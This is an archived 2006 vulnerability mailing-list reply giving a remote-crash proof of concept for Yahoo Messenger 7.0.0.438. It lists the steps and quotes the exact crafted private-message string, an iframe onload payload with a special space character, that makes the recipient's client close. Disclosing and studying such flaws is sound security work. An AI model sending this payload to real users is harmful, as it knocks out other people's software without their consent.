Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Vulnerability Development: Re: Yahoo Messenger 7.0.0.438 Crash Tested

Re: Yahoo Messenger 7.0.0.438 Crash Tested

From: <Ivancool2003_at_yahoo.com.ar>
Date: 18 Jun 2006 00:40:17 -0000

('binary' encoding is not supported, stored as-is) Remote crash proof of concept:
1. Open messenger and log it.
2. Open a yahoo chat third party like yahelite through Ymsgr protocol and log it with another account.
3. Send a Pm to the messenger account with this string: "s: msg :---------------------------------------------iframe onload=$InlineAction()>:)" (without quotes)
4. The remote user will crash closing down her messenger.
Note: "msg :" this space must be created with alt+0160.
Received on Jun 19 2006

This message: [ Message body ]
Next message: Fatal_Error_at_gmx.be: "Re: Yahoo Messenger 7.0.0.438 Crash Tested"
Previous message: thomas48: "SyScan'06 Highlight - Attacking Microsoft New Operating System (Vista)"
Maybe in reply to: Ivancool2003_at_yahoo.com.ar: "Yahoo Messenger 7.0.0.438 Crash Tested"
Next in thread: Fatal_Error_at_gmx.be: "Re: Yahoo Messenger 7.0.0.438 Crash Tested"

Contemporary messages sorted: [ by date ] [ by thread ] [ by subject ] [ by author ] [ by messages with attachments ]